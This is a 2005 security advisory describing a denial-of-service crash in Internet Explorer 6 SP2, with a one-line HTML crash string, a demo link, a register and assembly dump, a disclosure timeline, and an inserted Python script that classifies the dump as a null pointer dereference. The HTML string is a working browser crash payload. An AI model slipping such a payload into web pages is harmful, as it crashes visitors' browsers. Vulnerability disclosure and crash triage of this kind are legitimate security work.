Network Security Vuln-Dev

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3

Subject: [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3
Date: 24 Dec 2005 23:44:50 -0000

 ---------------------------------------------------
| BuHa Security-Advisory #6     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d8eba
===================

Following HTML code forces M$ IE 6 to crash:
<acronym><dd><h5><applet></caption></applet><li></h1>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d6d8e84 894c2414         mov     [esp+0x14],ecx
        7d6d8e88 8b8ea4000000     mov     ecx,[esi+0xa4]
        7d6d8e8e 24fe             and     al,0xfe
        7d6d8e90 57               push    edi
        7d6d8e91 89542410         mov     [esp+0x10],edx
        7d6d8e95 8954241c         mov     [esp+0x1c],edx
        7d6d8e99 88442420         mov     [esp+0x20],al
        7d6d8e9d e89912e5ff       call    mshtml+0x7a13b (7d52a13b)
        7d6d8ea2 8b4c2428         mov     ecx,[esp+0x28]
        7d6d8ea6 68b2a06e7d       push    0x7d6ea0b2
        7d6d8eab 8bf8             mov     edi,eax
        7d6d8ead e89bb7e5ff       call    mshtml+0x8464d (7d53464d)
        7d6d8eb2 50               push    eax
        7d6d8eb3 8bcf             mov     ecx,edi
        7d6d8eb5 e8dfebfdff       call    mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
                                          ds:0023:0000000c=????
        7d6d8ebe 6685d2           test    dx,dx
        7d6d8ec1 7c39             jl      mshtml+0x228efc (7d6d8efc)
        7d6d8ec3 833d50e3747d01   cmp     dword ptr [mshtml+0x29e350
                                          (7d74e350)],0x1
        7d6d8eca 0fbffa           movsx   edi,dx
        7d6d8ecd 7513             jnz     mshtml+0x228ee2 (7d6d8ee2)
        7d6d8ecf a14ce3747d       mov     eax,[mshtml+0x29e34c
                                          (7d74e34c)]
        7d6d8ed4 8b484c           mov     ecx,[eax+0x4c]
        7d6d8ed7 8b4134           mov     eax,[ecx+0x34]
        7d6d8eda 8d147f           lea     edx,[edi+edi*2]
        7d6d8edd 8b3c90           mov     edi,[eax+edx*4]
        7d6d8ee0 eb23             jmp     mshtml+0x228f05 (7d6d8f05)

The faulting instruction (mov dx,[eax+0xc]) executes with eax=0, so the read
targets address 0x0000000c. The access violation is therefore a plain null
pointer dereference and is not exploitable.
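As an added triage example (not part of the advisory): a small Python script that parses the WinDbg-style register dump and FAULT line shown above, computes the effective address of the faulting memory operand and confirms why the crash is classed as a null pointer dereference. The embedded dump text is a subset of the output on this page; the page-size threshold is an assumption.

```python
import re

# Register dump and faulting instruction as they appear in the advisory
# (a subset of the WinDbg-style output quoted above).
CRASH_DUMP = """\
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
        7d6d8eb5 e8dfebfdff       call    mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
        7d6d8ebe 6685d2           test    dx,dx
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip)=([0-9a-f]{8})")
# One x86 memory operand such as [eax+0xc], [esi+0xa4] or [eax+edx*4]
MEM_RE = re.compile(r"\[(e\w\w)(?:\+(e\w\w)\*(\d))?(?:\+0x([0-9a-f]+))?\]")

def parse_registers(dump):
    """Return {register: value} from the 'eax=... ebx=...' lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}

def faulting_operand(dump):
    """Return the regex match for the memory operand on the FAULT -> line."""
    for line in dump.splitlines():
        if line.startswith("FAULT ->"):
            m = MEM_RE.search(line)
            if m:
                return m
    return None

def effective_address(dump):
    """Compute base + index*scale + displacement for the faulting operand."""
    regs = parse_registers(dump)
    m = faulting_operand(dump)
    if m is None:
        raise ValueError("no memory operand on the FAULT line")
    base, index, scale, disp = m.groups()
    addr = regs[base]
    if index:
        addr += regs[index] * int(scale)
    if disp:
        addr += int(disp, 16)
    return addr & 0xFFFFFFFF

def classify(dump, page_size=0x1000):
    """A zero base register plus a small offset lands in the unmapped first
    page: that is the signature of a NULL pointer dereference (page_size is
    an assumed threshold for a 32-bit Windows process)."""
    base = faulting_operand(dump).group(1)
    if parse_registers(dump)[base] == 0 and effective_address(dump) < page_size:
        return "null-pointer-dereference"
    return "other-access-violation"
```

Running classify(CRASH_DUMP) on the advisory's dump reports a null pointer dereference at address 0xc, matching the ds:0023:0000000c=???? annotation.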


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
M$ IE 6 SP2 - Win XP Pro SP2
M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@deneke.biz>

--

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more of a
spam address than a regular mail address, so it is possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

